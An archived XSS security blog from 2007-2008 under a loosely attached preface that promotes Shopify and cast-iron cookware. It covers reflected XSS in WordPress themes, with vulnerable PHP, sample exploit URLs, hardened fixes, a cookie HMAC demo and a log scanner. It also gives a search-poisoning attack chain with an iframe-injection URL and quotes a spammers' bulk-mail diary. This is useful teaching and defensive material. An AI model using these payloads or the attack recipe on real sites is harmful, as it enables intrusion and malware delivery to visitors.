It's About Security
2007-2008 XSS NEWS


XSS News Blog

The content below is from the site's 2007-2008 archived pages as well as from more recent outside sources.

~~~~~

Boy, have there been changes on the web since 2007. But almost fifteen years later WordPress sites still have issues. Cross-site scripting (XSS) remains a major attack vector in web security, and year after year these attacks still make headlines. Just take a look at some recent web security headlines, the last of them an XSS story:
  • Gitlab patches critical RCE bug in latest security release, by Jessica Haworth, 01 July 2022 at 13:26 UTC
  • Australia’s Monash University launches public bug bounty program, by James Walker, 04 July 2022 at 14:28 UTC
  • Business email platform Zimbra patches memcached injection flaw that imperils user credentials, by Adam Bannister, 16 June 2022 at 11:04 UTC
  • Researcher goes public with WordPress CSP bypass hack, by John Leyden, 01 June 2022 at 16:40 UTC

As of 2017, the commonly cited WordPress security issues were:

  • Brute Force Attacks
  • File Inclusion Exploits
  • SQL Injections
  • Cross-Site Scripting (XSS)
  • Malware
  • Weak Passwords
  • Not Updating WordPress, Plugins or Themes
  • Using Plugins and Themes from Untrustworthy Sources

Nevertheless many sites still use WordPress. Although WordPress is very popular, most site owners need extra help from webmasters who are proficient in WordPress to help them with plug-ins and other issues. Take for example Zendesk, a help desk platform. It’s a robust piece of software with a lot of options for customizing. Understanding how it works is only part of the equation; a company also needs to know how it can work for their business. First of all, know that Zendesk Support for WordPress allows you to bring your help desk, powered by Zendesk, onto your blog or website. But for a smooth transition most companies opt to hire experts in Zendesk support and customization. An expert can help you set up all the great features Zendesk has to offer. In 2007 a platform like Zendesk didn't exist. Instead we were working on web security and such.

I have a friend who recently created a website for his cast iron housewares product line. He considered a WordPress platform but eventually went with Shopify. His reasoning was that Shopify is cheaper overall: although Shopify has plans that range from $29/month to $299/month, they include everything one needs, whereas WordPress is free to use but one then has to pay separately for the hosting, themes, and plugins. Shopify is better for his sales-focused cast iron cookware business. He needed an easy-to-use, full-featured and relatively automated e-commerce solution, and Shopify satisfied that need.

If you want to see some fantastic looking cast iron skillets, look at this versatile 9" pan. It's like a little piece of art that can cook anything from a traditional steak or eggs to apple pie. The cast iron skillet's handle blew me away. It is meticulously sculpted in the shape of a cherry branch but is economically designed to accommodate both left- and right-handed cooks. Its longer length makes for better balance. The interiors of the Nest Homeware cast iron cookware are machined smooth and then pre-seasoned with two rounds of organic flaxseed oil, which makes for an incredible cooking experience. And the color, a lustrous bronzy hue resulting from the pre-seasoning temperature of 425º F, makes all of his cookware stand apart from other cast iron cookware. In use, this color will change, deepening and darkening over time as layers of seasoning build, eventually reaching a rich black. I love to cook so I can appreciate all his cast iron products, from the small 4.5" skillets to the 9" skillet, to the braising pan and dutch oven with their respective tops. I just wish I could afford them!


So far he is happy with choosing Shopify. He has not had any security issues or cross-site scripting (XSS) problems.

Another friend who was helping a Connecticut brick-and-mortar eyeglasses store set up their first website had cross-site scripting (XSS) issues with their WordPress site. In hindsight it was obvious that WordPress still needed to work on security, and it still has issues! The new site was immediately hit with login attempts from unknown IPs, and eventually the site was hacked and had to be reinstalled. Wondering if there were a legal remedy for this security issue, he called on his lawyer friend, who pointed out the disclaimer he had agreed to when downloading the free software. Apparently WordPress is immune from any kind of legal liability when you use their product, even though there are definitely some security issues with it. Even a decade later some things never change, or perhaps have to keep changing, which is what that store recognized. They decided to go with a custom-built CMS site. It allowed them more flexibility in showcasing their vast number of products from all the top brands, as well as a separate section focused on some custom products. They have so far never been hacked.

Another friend



2007 POSTS

I plan to post here a bunch of web security news (mostly XSS).
Hopefully somebody will find this blog interesting :)

Posted by admin on 6 June 2007

 


WordPress default theme XSS

There is an XSS in the default theme from WordPress. However, it only works if the admin is logged in, because the vulnerable code is the theme's options page under wp-admin (themes.php?page=functions.php), which nobody else can reach.
Filename functions.php

$_SERVER['REQUEST_URI'] is echoed straight back to the user without any escaping.

http://www.example.com/wp-admin/themes.php?page=functions.php&zmx">

Sample exploit URL

 

Posted by admin on 8 June 2007

 

+++

XSS in WordPress themes

BlogSecurity posted some information about common vulnerabilities found in WordPress themes.
Basically, the themes are using $_SERVER variables such as $_SERVER['PHP_SELF'] insecurely: the value is taken from the request and printed into the page as-is.

Here is an example from my theme AndyBlue, which was also vulnerable.
Filename searchform.php

http://www.example.com/index.php/">

Sample exploit URL

However, PHP_SELF is just one of the variables that should be considered. Here is a list of the ones I know about; there may be others. All of them are built from the client's request, so they should be used with caution.

  • PHP_SELF
  • REQUEST_URI
  • SCRIPT_URL
  • SCRIPT_URI

Here is an example from another theme, Vistered-Little. This time they are not using PHP_SELF but REQUEST_URI.

The problem is in the file 404.php

PHP:

    function selfURL() {
        $s = empty($_SERVER["HTTPS"]) ? "" : (($_SERVER["HTTPS"] == "on") ? "s" : "");
        $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/") . $s;
        $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":" . $_SERVER["SERVER_PORT"]);
        // HTTP_HOST comes from the Host header and REQUEST_URI from the request line;
        // both are attacker-controlled and neither is escaped before being printed.
        return $protocol . "://" . $_SERVER['HTTP_HOST'] . $port . $_SERVER['REQUEST_URI'];
    }
    function strleft($s1, $s2) {
        return substr($s1, 0, strpos($s1, $s2));
    }
    print(selfURL());

http://www.example.com/index.php?error=404&

Sample exploit URL

Because the problem is in 404.php, we need to request a page that does not exist so that the 404 template is rendered, and then inject the script through the URL.
So, the same problem, just a different variation: $_SERVER variables cannot be trusted. (Note that selfURL() also prints HTTP_HOST, which comes straight from the client's Host header.)

These XSS bugs in WordPress themes are worse than an ordinary reflected XSS: if you manage to get an administrator to click your link, the injected script runs inside the admin's session and can drive the built-in theme editor in wp-admin to write PHP of the attacker's choosing into a theme file. So, after that it's game over.

These are just two examples; a lot of WordPress themes are vulnerable to this type of issue.
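Here is an added example, not code from the original post or from any of the themes named above, that reproduces both patterns in one runnable script: the searchform.php case echoing PHP_SELF and the 404.php case echoing REQUEST_URI, each next to a hardened version. The $_SERVER values, the site URL and the payloads are constructed so that it runs from the command line; the esc_url()/home_url() mention in the comments refers to current WordPress helpers, not to anything in the 2007 themes.

```php
<?php
// Added example, not from the original post or any of the themes named above.
// It reproduces the two theme patterns side by side with hardened versions.
// $_SERVER is populated by hand so the script runs from the CLI (constructed input).

$_SERVER['PHP_SELF']    = '/index.php/"><script>alert(1)</script>';             // PHP_SELF carries PATH_INFO
$_SERVER['REQUEST_URI'] = '/index.php?error=404&x="><script>alert(1)</script>'; // REQUEST_URI carries the query string
$_SERVER['HTTP_HOST']   = 'www.example.com';                                     // also attacker-influenced (Host header)

// Vulnerable: the searchform.php pattern. The action attribute closes at the
// injected quote and the rest of PHP_SELF becomes markup.
function vulnerable_searchform(): string {
    return '<form method="get" action="' . $_SERVER['PHP_SELF'] . '">'
         . '<input type="text" name="s" /></form>';
}

// Vulnerable: the 404.php pattern (selfURL() above, reduced to the echo that matters).
function vulnerable_404(): string {
    return '<p>Not found: http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . '</p>';
}

// Hardened: build the action from a value the application controls, not from the
// request (in WordPress: esc_url(home_url('/'))), and still attribute-encode it.
function hardened_searchform(string $site_url): string {
    return '<form method="get" action="' . htmlspecialchars($site_url, ENT_QUOTES, 'UTF-8') . '">'
         . '<input type="text" name="s" /></form>';
}

// Hardened: if the request value really must be displayed, encode it for the HTML
// context. ENT_QUOTES matters: without it a double quote survives and can close an attribute.
function hardened_404(): string {
    $url = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    return '<p>Not found: ' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Crude check used for the demonstration: does a raw script tag reach the page?
function contains_injection(string $html): bool {
    return strpos($html, '<script') !== false;
}

$results = [
    'vulnerable_searchform' => contains_injection(vulnerable_searchform()),
    'vulnerable_404'        => contains_injection(vulnerable_404()),
    'hardened_searchform'   => contains_injection(hardened_searchform('https://www.example.com/')),
    'hardened_404'          => contains_injection(hardened_404()),
];
foreach ($results as $name => $injected) {
    printf("%-22s %s\n", $name, $injected ? 'script tag reaches the page' : 'clean');
}
```

The two hardened functions make different choices on purpose: the form action never needed request data in the first place, so the fix is to stop reading $_SERVER there at all; the 404 page arguably does want to show the requested URL, so there the fix is output encoding for the exact context the value lands in.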

 

Posted by admin on 7 June 2007 

 

+++

cordobo-green-park theme

Another XSS in the cordobo-green-park theme.
Filename blogroll.php

http://www.example.com/wp-content/themes/cordobo-green-park/blogroll.php/">

Sample exploit URL

 

Posted by admin on 7 June 2007

 

+++

PHP Abstract Episode 1 - PHP Security Tips

The Zend guys have started a PHP podcast. The first episode is about PHP security.
They have invited Eli White (the PHP guru from Digg). Eli talks about XSS (cross-site scripting) and CSRF (cross-site request forgery). Interesting episode.

 

Posted by admin on 6 June 2007

 

 

++++++++

2008 POSTS

kisview 0.2

March 30th, 2008

Implemented a few more things in kisview (some fixes, parsing of Windows announcement packets, silently resolving IP addresses, ...).

Tags: kisview

BlackHat Europe 2008

March 30th, 2008

Black Hat Europe 2008 Media Archives are online. Worth checking out.


WordPress 2.5 - nice security improvements

March 30th, 2008

WordPress 2.5 was released and it has a bunch of important security improvements.
Quoting from the release post:

Salted passwords — we now use the phpass library to stretch and salt all passwords stored in the database, which makes brute-forcing them impractical. If you use something like mod_auth_mysql we’ve created a plugin that will allow you to use legacy MD5 hashing. (The hashing is completely pluggable.) Users will automatically switch to the more secure passwords next time they log in.

Secure cookies — cookies are now encrypted based on the protocol described in this PDF paper, which is something like user name|expiration time|HMAC( user name|expiration time, k) where k = HMAC(user name|expiration time, sk) and where sk is a secret key, which you can define in your config.

// Change SECRET_KEY to a unique phrase.  You won't have to remember it later,
// so make it long and complicated.  You can visit https://www.grc.com/passwords.htm
// to get a phrase generated for you, or just make something up.
define('SECRET_KEY', 'put your unique phrase here'); // Change this to a unique phrase.

You need to set SECRET_KEY in wp-config.php; the placeholder phrase must not be left in place.
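The cookie scheme quoted above is worth seeing end to end. What follows is an added example, not WordPress's own code: it builds and validates a cookie of exactly that shape, with SECRET_KEY playing the role of sk. One caveat on the wording from the release post: the cookie is authenticated, not encrypted. Anyone holding it can read the user name and expiration; what the HMAC prevents is forging a cookie or altering those fields without sk. It does nothing against a stolen cookie, which replays until the expiration passes, and a stolen cookie is exactly what the theme XSS bugs earlier on this page hand an attacker. The hash (SHA-256), the secret, the user name and the timestamps in the block are the example's own choices.

```php
<?php
// Added example, not WordPress's own code. Implements the quoted construction:
//   user|expiration|HMAC(user|expiration, k)   where k = HMAC(user|expiration, sk)
// sk is the server-side SECRET_KEY from wp-config.php. All values are constructed.

const HASH_ALGO = 'sha256';   // the example's choice of hash for both HMACs

function make_auth_cookie(string $user, int $expiration, string $secret_key): string {
    $data = $user . '|' . $expiration;
    $k    = hash_hmac(HASH_ALGO, $data, $secret_key);   // per-cookie key derived from sk
    $mac  = hash_hmac(HASH_ALGO, $data, $k);            // MAC over the visible fields
    return $data . '|' . $mac;
}

// Returns the user name if the cookie is intact and unexpired, otherwise null.
function validate_auth_cookie(string $cookie, string $secret_key, int $now): ?string {
    $parts = explode('|', $cookie);
    if (count($parts) !== 3) {                 // also rejects user names containing '|'
        return null;
    }
    [$user, $expiration, $mac] = $parts;
    if (!ctype_digit($expiration) || (int)$expiration < $now) {
        return null;                            // malformed or expired timestamp
    }
    // Recompute from the claimed fields and compare the whole cookie in constant time;
    // a plain == on the MAC string would leak the correct prefix byte by byte.
    $expected = make_auth_cookie($user, (int)$expiration, $secret_key);
    return hash_equals($expected, $cookie) ? $user : null;
}

// Demonstration with constructed values.
$sk     = 'put your unique phrase here';   // the wp-config.php placeholder; never ship it
$now    = 1206835200;                      // 2008-03-30 00:00:00 UTC, constructed
$cookie = make_auth_cookie('admin', $now + 2 * 86400, $sk);

$checks = [
    'valid cookie'          => validate_auth_cookie($cookie, $sk, $now) === 'admin',
    'expired cookie'        => validate_auth_cookie($cookie, $sk, $now + 3 * 86400) === null,
    'user name tampered'    => validate_auth_cookie(str_replace('admin|', 'editor|', $cookie), $sk, $now) === null,
    'expiration extended'   => validate_auth_cookie(
                                   preg_replace('/\|(\d+)\|/', '|' . ($now + 30 * 86400) . '|', $cookie),
                                   $sk, $now) === null,
    'wrong secret rejected' => validate_auth_cookie($cookie, 'some other key', $now) === null,
];
foreach ($checks as $name => $ok) {
    printf("%-22s %s\n", $name, $ok ? 'ok' : 'FAIL');
}
```

The "expiration extended" check is the one that matters most in practice: the expiration is in cleartext and looks editable, but any change to it invalidates both k and the MAC, so the cookie lifetime is bounded by the server, not the client.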

$wpdb->prepare() — now almost all of the SQL in WordPress is prepared first, and the same functions are available to your plugins. This should prevent elementary SQL escaping issues.

That should solve a few problems. Nice work:)


In related news, there is a WordPress 2.3.3 zero-day currently being exploited. It seems to be an automated attack; it creates the directory /wp-content/1. The current exploit counter is at 23,000 and still growing.

 


Diary of A New Mailer

March 24th, 2008

Here is an interesting read: some guys are starting in the mailing/spamming business and are telling their story step by step. I found this thread on the wickedfire forums. I don't want to link to the thread directly, just go to wickedfire.

Here are a few excerpts from their “experience”:

okay, this thread will be about my journey into email marketing.

We bought
–5 user license from STEDB
–2 C-Blocks, 3 servers, two mailers and 1 database server from Big Sky - we are colocating with them as well.
–a boatload of data from Eclipse
–500 domain names from Moniker (com’s and net’s)

SYSTEM UPDATE: our servers are up, we have gone through our initial training on STEDB, loaded our names, and started building out campaigns. We will be mailing campaigns starting tomorrow. In my next post, I will talk about our testing strategy (and hopefully get some feedback if it makes any sense!)

Our strategy is to send 250k emails out over a 5 day period to twenty different offers to begin our process of sorting winners that we will then mail out to our entire list. So, each day we are going to send 50K to each. In the next week, we will take the most profitable (top five probably) and get them mailed out to the entire list. One of the first challenges we have run into is how to make sure that we do not over mail any one address. We have 11mm unique emails we are starting with, but there is a concern that we may not be getting the best distribution across our entire list.

Well, day 1 was complete. We sent out only 1mm messages as we wanted to test out some various ads to see which one we would go with (see previous post about our testing method). On first thought, I believe our sample size is too low. We went with 50K messages to the same offer over 5 days. Well, the clicks off 50K messages are so small that it is really too hard to make any true decisions on the sales side. So, we are going to up that to 500K per offer, test fewer offers.

Out of the gate we ran into some problems with our mail servers, which STEDB quickly fixed. It was exciting to see mail go out the door.

Our hard bounce rate wasn’t so bad, about 13%, which on review and discussion with others is great. Anything below 20% on a first mailing and you are clear.

The soft bounce rate was higher than we expected and all over the map. Sometimes we would have 40K+ delivered in a 50K sample, other times we would only get 10K in (delivered can also mean junk folder).

The data we are going to look at tonight to prune the list is the ratio of opens, unsubs from our list, and click throughs. I will give a more detailed update at the end of the week.

Day 3, fun and games continue! We changed our strategy today, sending out 1M emails to 4 offers. Tomorrow, we will send out 2M emails to 4 offers, and Friday, we are going to try and push 2M emails to one offer. So far, here is an example of what we are doing

(this one launched 12 hours ago)

To Send = 269000
Delivered = 155000
Deferred = 100000
Bounced = 14000
Opens = 662
Clicks = 167
Unsubs = 58
Sales = 2

These are general internet mailings, with using approved creative and sub lines from the affiliates (working with recos from azoogle, neverblue, copeac)

Now, the clicks are split 60/40 between the actual offer and the offer unsub link, in this case we only have about 96 folks who really looked at the deal.

I was really surprised at the total number of unsubs (ours + the offers') relative to the clicks. I thought it would be high, but in reality it is equal if not greater.

Obviously a lot of those Delivered are getting in the junk folder instead. I am estimating in this case maybe only 20,000 of the ToSend are actually in the inbox (going off an expected number of 15 clicks per thousand delivered in the inbox).

So, we pushed out 1.7M emails today to one offer to get a sense for what larger numbers would produce. We pulled out comcast, att, rr, etc. so we were left with only small ISPs and true general internet (so we thought).

I excluded rr.com in my email domains. Of course, road runner ends in that, but the whole domain is something very different! I did not think to ask about wild cards until that very moment! (STEDB does have wild cards, to exclude all rr.com ‘%rr.com’ will do it). Get your mistakes out of the way early!

We have finished setting up all the FBLs we can find, and will start pushing out Yahoo, AOL, etc. next week in LOW volume at first (around 500-1000 mails per ip / per ISP / per domain) around 220K to each one of them.

Our total click through is still not great. On the mailing this morning it looked like this:

to send = 1.77M
deferred = 600K (almost all road runner)
bounced ~170k (first mailing against this list segment, so happy with this)
delivered ~ 1M
Opened - 5300
clicked - 614 (split 50/50 between the offer and the offer unsub)
Unsub - 65

We got an email in our notprocess folder the past two days from a company that has blacklisted us. The message starts with

“Remain calm! Please read all of this message before acting.

We have received mail from your site that our system thinks is junk
mail, because it was sent to a `spambait’ address. We have therefore
made an entry for you in our blacklist for the offending system’s IP…”

Of course, they have whacked the header so we cannot tell which email address it was. Fun! What investigative process do you use to find folks like this?

 


Interesting attacks using XSS

March 18th, 2008

There were some interesting attacks in the past few days, all of them exploiting XSS (cross-site scripting) vulnerabilities.
I've been discussing them with my colleagues and here is what I think is happening:

1. Some hacker(s) find a bunch of vulnerable websites (that's easy: there are a lot of vulnerable websites, or if you are lazy just take them from here).

2. Prepare a list of URLs with the XSS included in the URL, something like
http://www.somewebsite.com/vulnerablescript.php?q=some+popular+words+and+<iframe+src=hackersite>

3. Prepare a page with browser exploits or just old tricks (like a never-ending popup storm: a common user will never figure out how to escape from it, will at some point get tired of clicking No/Cancel, and will just click Open).

4. Post the XSS URLs on a bunch of blogs (think Blogspot = Google) and wait for Google to index them.

5. Profit (when users search for your popular words, the indexed XSS URLs will appear in the search results).

Pretty interesting usage of XSS.
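The chain above leaves a footprint in the target site's access log at two points: the attacker's own probes while preparing the URLs in step 2, and, once step 4 has worked, victims arriving from search results with the payload still in the query string. The following added example (not from the original post) scans constructed Apache combined-format log lines for request targets that decode to HTML or script markup, and flags hits that carry a search-engine referer, which means the poisoned result is already live. The log lines, IP addresses (documentation ranges), marker list and referer pattern are all the example's own.

```php
<?php
// Added example, not from the original post: detect the footprint of the attack
// chain above in web server access logs. Log lines are constructed for this example
// (Apache combined format); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.

$log = <<<'LOG'
203.0.113.5 - - [18/Mar/2008:10:01:22 +0000] "GET /search.php?q=cheap+tickets HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.5 - - [18/Mar/2008:10:01:30 +0000] "GET /search.php?q=cheap+tickets+%3Ciframe+src%3Dhttp%3A%2F%2Fhackersite%2F%3E HTTP/1.1" 200 5200 "-" "Mozilla/4.0"
198.51.100.7 - - [18/Mar/2008:11:45:02 +0000] "GET /search.php?q=%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E HTTP/1.1" 200 5190 "http://www.google.com/search?q=cheap+tickets" "Mozilla/5.0"
198.51.100.9 - - [18/Mar/2008:11:46:10 +0000] "GET /index.php?error=404&x=1 HTTP/1.1" 404 800 "-" "Mozilla/5.0"
LOG;

// Markers are matched against the decoded, lower-cased request target.
$XSS_MARKERS = ['<iframe', '<script', 'javascript:', 'onerror=', 'onload=', '"><'];

// Percent-decode the target ('+' becomes a space). A second pass catches
// double-encoded payloads (%253C -> %3C -> <), which a single decode would miss.
function decode_target(string $target): string {
    $once  = urldecode($target);
    $twice = urldecode($once);
    return strtolower($twice);
}

// Parse one combined-format line into the fields we need, or null if it does not match.
function parse_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4],
            'status' => (int)$m[5], 'referer' => $m[6]];
}

// Returns the requests whose decoded target contains at least one marker.
function scan_log(string $log, array $markers): array {
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        $req = parse_line($line);
        if ($req === null) {
            continue;
        }
        $decoded = decode_target($req['target']);
        $found = [];
        foreach ($markers as $marker) {
            if (strpos($decoded, $marker) !== false) {
                $found[] = $marker;
            }
        }
        if ($found === []) {
            continue;
        }
        // A search-engine referer on a payload hit means step 5 is already happening:
        // the poisoned URL is indexed and victims are arriving through it.
        $req['markers'] = $found;
        $req['via_search_engine'] = (bool)preg_match('~^https?://(www\.)?(google|yahoo|live|bing)\.~i', $req['referer']);
        $hits[] = $req;
    }
    return $hits;
}

foreach (scan_log($log, $XSS_MARKERS) as $hit) {
    printf("%s %s %s markers=[%s]%s\n", $hit['time'], $hit['ip'], $hit['target'],
           implode(', ', $hit['markers']), $hit['via_search_engine'] ? ' via search engine' : '');
}
```

Run against the constructed lines, the first and fourth requests pass, the second is flagged on the iframe, and the third is flagged on both the double-encoded script tag and the attribute-breaking `"><` with the Google referer noted. Unconditionally decoding twice will occasionally misread a legitimate literal percent sign, which is acceptable for a triage pass but worth remembering if the output feeds an automatic block list.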


XSSNews.com